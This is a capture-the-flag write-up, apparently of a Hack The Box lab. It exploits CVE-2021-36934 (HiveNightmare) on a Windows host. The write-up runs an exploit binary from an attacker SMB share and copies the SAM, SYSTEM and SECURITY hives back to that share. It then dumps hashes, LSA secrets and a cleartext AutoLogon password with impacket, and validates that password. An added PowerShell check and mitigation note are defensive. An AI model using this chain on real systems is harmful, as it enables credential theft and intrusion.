CVE-2021-36934


Manually checking for CVE-2021-36934 after performing basic enumeration because PEAS didn’t seem to check for it

ps c:\Users\btables\Documents> cmd /c icacls C:\Windows\System32\Config\SAM
cmd /c icacls c:\Windows\System32\Config\SAM
c:\Windows\System32\Config\SAM BUILTIN\Administrators:(I)(F)
                               nt authority\system:(I)(F)
                               builtin\users:(I)(RX)
                               application package authority\all application packages:(I)(RX)
                               application package authority\all restricted application packages:(I)(RX)
 
Successfully processed 1 files; Failed processing 0 files
ps c:\Users\btables\Documents> cmd /c icacls C:\Windows\System32\Config\SYSTEM
cmd /c icacls c:\Windows\System32\Config\SYSTEM
c:\Windows\System32\Config\SYSTEM BUILTIN\Administrators:(I)(F)
                                  nt authority\system:(I)(F)
                                  builtin\users:(I)(RX)
                                  application package authority\all application packages:(I)(RX)
                                  application package authority\all restricted application packages:(I)(RX)
 
Successfully processed 1 files; Failed processing 0 files
ps c:\Users\btables\Documents> cmd /c icacls C:\Windows\System32\Config\SECURITY
cmd /c icacls c:\Windows\System32\Config\SECURITY
c:\Windows\System32\Config\SECURITY BUILTIN\Administrators:(I)(F)
                                    nt authority\system:(I)(F)
                                    builtin\users:(I)(RX)
                                    application package authority\all application packages:(I)(RX)
                                    application package authority\all restricted application packages:(I)(RX)
 
Successfully processed 1 files; Failed processing 0 files

The target system is confirmed to be vulnerable to CVE-2021-36934

A vulnerability was found in Microsoft Windows 10/11 (Operating System) and classified as critical. Affected by this issue is some unknown processing of the file C:\Windows\System32\config\SAM of the component Volume Shadow Copy. The manipulation with an unknown input leads to a permission vulnerability (SeriousSAM/HiveNightmare). Using CWE to declare the problem leads to CWE-275. Impacted is confidentiality.

CVE-2021-36934, also known as “HiveNightmare” or “SeriousSAM”, is a security vulnerability affecting Windows systems. The flaw allows non-privileged users to access and read sensitive registry hives, including the SAM and SYSTEM hives, which store critical system configuration and security information, including hashed passwords. Exploiting this vulnerability may lead to unauthorized access to sensitive data, posing a risk of credential exposure. Microsoft addressed this issue by releasing security updates, and users are advised to apply the necessary patches to mitigate the risk of exploitation.
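The manual icacls check above, as an added PowerShell example that is not part of the original write-up: it tests the two preconditions this CVE needs on a host, the permissive BUILTIN\Users ACL on the hive files and an existing shadow copy for them to be read from. The function name, its parameter and the output field names are assumed names.

```powershell
# Added check (not from the original write-up): tests both preconditions of
# CVE-2021-36934 on the local host. The ACL part works as a standard user, like
# the icacls check above; run elevated for the shadow-copy count to be meaningful.
function Test-HiveNightmare {
    [CmdletBinding()]
    param(
        # Hive directory; override only when auditing a copied tree.
        [string]$ConfigDir = (Join-Path $env:SystemRoot 'System32\config')
    )

    $usersSid = [System.Security.Principal.SecurityIdentifier]'S-1-5-32-545'   # BUILTIN\Users
    $readData = [System.Security.AccessControl.FileSystemRights]::ReadData

    # Precondition 1: BUILTIN\Users is allowed to read the hive files.
    # The builtin\users:(I)(RX) entries in the icacls output above are this case.
    $exposed = foreach ($hive in 'SAM', 'SYSTEM', 'SECURITY') {
        $path = Join-Path $ConfigDir $hive
        if (-not (Test-Path -LiteralPath $path)) { continue }
        foreach ($ace in (Get-Acl -LiteralPath $path).Access) {
            try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]) }
            catch { continue }   # identity that cannot be resolved on this host
            if ($sid -eq $usersSid -and $ace.AccessControlType -eq 'Allow' -and
                ([int]($ace.FileSystemRights -band $readData) -ne 0)) {
                [pscustomobject]@{ Hive = $hive; Rights = $ace.FileSystemRights; Inherited = $ace.IsInherited }
            }
        }
    }

    # Precondition 2: a VSS shadow copy exists. The live hives are locked by the
    # kernel, which is why the dump above read them from HarddiskVolumeShadowCopy3.
    $shadows = @(Get-CimInstance -ClassName Win32_ShadowCopy -ErrorAction SilentlyContinue)

    [pscustomobject]@{
        UsersCanReadHives = [bool]$exposed
        ExposedHives      = @($exposed)
        ShadowCopyCount   = $shadows.Count
        Vulnerable        = ([bool]$exposed -and $shadows.Count -gt 0)
    }
}

Test-HiveNightmare | Format-List
```

Microsoft's published workaround for this CVE is to re-apply restrictive ACLs with `icacls %windir%\system32\config\*.* /inheritance:e` from an elevated prompt and to delete existing VSS shadow copies; rerunning the check afterwards should report both preconditions cleared.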

Exploit


Exploit available online. The repo provides pre-compiled binaries.

Exploitation


ps c:\Users\btables\Documents> \\10.10.14.23\smb\HiveNightmare\Release\HiveNightmare.exe 
 
HiveNightmare v0.6 - dump registry hives as non-admin users
Specify maximum number of shadows to inspect with parameter if wanted, default is 15.
Running...
 
newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM
success: SAM hive from 2023-12-13 written out to current working directory as SAM-2023-12-13
 
newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SECURITY
success: SECURITY hive from 2023-12-14 written out to current working directory as SECURITY-2023-12-14
 
newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SYSTEM
success: SYSTEM hive from 2023-12-14 written out to current working directory as SYSTEM-2023-12-14
 
Assuming no errors above, you should be able to find hive dump files in current working directory.

Executing the binary

ps c:\Users\btables\Documents> ls
 
 
    directory: C:\Users\btables\Documents
 
 
Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          1/5/2024   2:22 PM        3119779 adPEAS.ps1                                                           
-a----          1/5/2024   2:53 PM           8397 MjdhMDc5MjItNDk4MS00NjFiLWFkY2ItZjQ0ZTBlODI3Mzhh.bin                 
-a----          1/5/2024   2:53 PM          11797 outdated.htb_20240105145344_BloodHound.zip                           
-a----          1/5/2024   3:49 PM          65536 SAM-2023-12-13                                                       
-a----          1/5/2024   3:49 PM          32768 SECURITY-2023-12-14                                                  
-a----          1/5/2024   3:49 PM       11534336 SYSTEM-2023-12-14                                                    
-a----          1/5/2024   2:23 PM        1968640 winPEASx64.exe                                                       

The registry hives are saved

ps c:\Users\btables\Documents> copy *-2023-* \\10.10.14.23\smb\HiveNightmare\

Downloading the registry hives to Kali

Hashdump


┌──(kali㉿kali)-[~/…/htb/labs/outdated/HiveNightmare]
└─$ impacket-secretsdump local -sam SAM-2023-12-13 -system SYSTEM-2023-12-14 -security SECURITY-2023-12-14 
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Target system bootKey: 0x0e2bd3cb19e8aa5c74f4b9161423a373
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:cadef52f10f56e21d9f4934c4d5bf813:::
[*] Dumping cached domain logon information (domain/username:hash)
OUTDATED.HTB/btables:$DCC2$10240#btables#91e9188a93c8b59479cbe490e22fc790: (2024-01-05 19:49:45)
OUTDATED.HTB/Administrator:$DCC2$10240#Administrator#fcf452603a2e8ee8f65158c73469cf7e: (2023-12-13 04:07:43)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:e07fd3b58402edcb90c624e44d97e0eec240dc23108958742cd8d9550fc461254b6988bf6d7bfa396f610b530569af60c01c7bf4200debcc0bc1a44daab8ccd1ceff5a12e08a967f78f3bed6a0386df6df696d7d4493377b02c8c91bd3efd21adf30d302e9024a34958b5cef97f92f7cb9ad86b42e7e0909c1f663296cdafb5c080920e6470f3c1c8bce667255f491795a3fbeee06600153728ca1ef7802a226373487aad8745a0ebaa3d51c21ec672c205a23fc3f5f77d9ce58e758254206f0c006bde3a64890248b4522d561425d82e4d26950c06877fc25103221cb61ff3e10b4b13c899f6a58d0b047b30e0956d6
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d805ad109346699956d56bf7ff7aad7a
[*] DefaultPassword 
(Unknown User):5myBPLPDKT3Bfq
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x76a645f1d5e5879a07eb92ccc767cbe8bf5d8219
dpapi_userkey:0x8225e352fcf823af35757bacff4cdfe98c73db8f
[*] NL$KM 
 0000   08 4C 51 0B 9B 09 ED C8  4D 12 A0 47 40 5B 64 2D   .LQ.....M..G@[d-
 0010   32 3C AC B5 E2 42 0E 41  76 99 DE D7 20 E6 15 B9   2<...B.Av... ...
 0020   79 57 B8 29 D2 5D 44 91  3F D5 84 76 BE 00 D2 00   yW.).]D.?..v....
 0030   16 8B 85 3D 3F 17 27 1F  16 4F C0 37 64 6E 44 E5   ...=?.'..O.7dnD.
NL$KM:084c510b9b09edc84d12a047405b642d323cacb5e2420e417699ded720e615b97957b829d25d44913fd58476be00d200168b853d3f17271f164fc037646e44e5
[*] Cleaning up... 

Dumping credentials from the registry hives. While these credentials are system-only and there are no non-default local users on the client.outdated.htb host, there is a CLEARTEXT password stored as "DefaultPassword": 5myBPLPDKT3Bfq

This password likely belongs to the btables user as the user has AutoLogon configured

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/outdated]
└─$ impacket-getTGT OUTDATED.HTB/btables@dc.outdated.htb -k -dc-ip $IP 
Impacket v0.11.0 - Copyright 2023 Fortra
 
password: 5myBPLPDKT3Bfq
[*] Saving ticket in btables@dc.outdated.htb.ccache

Credential validated against the target KDC; a TGT is saved for the btables user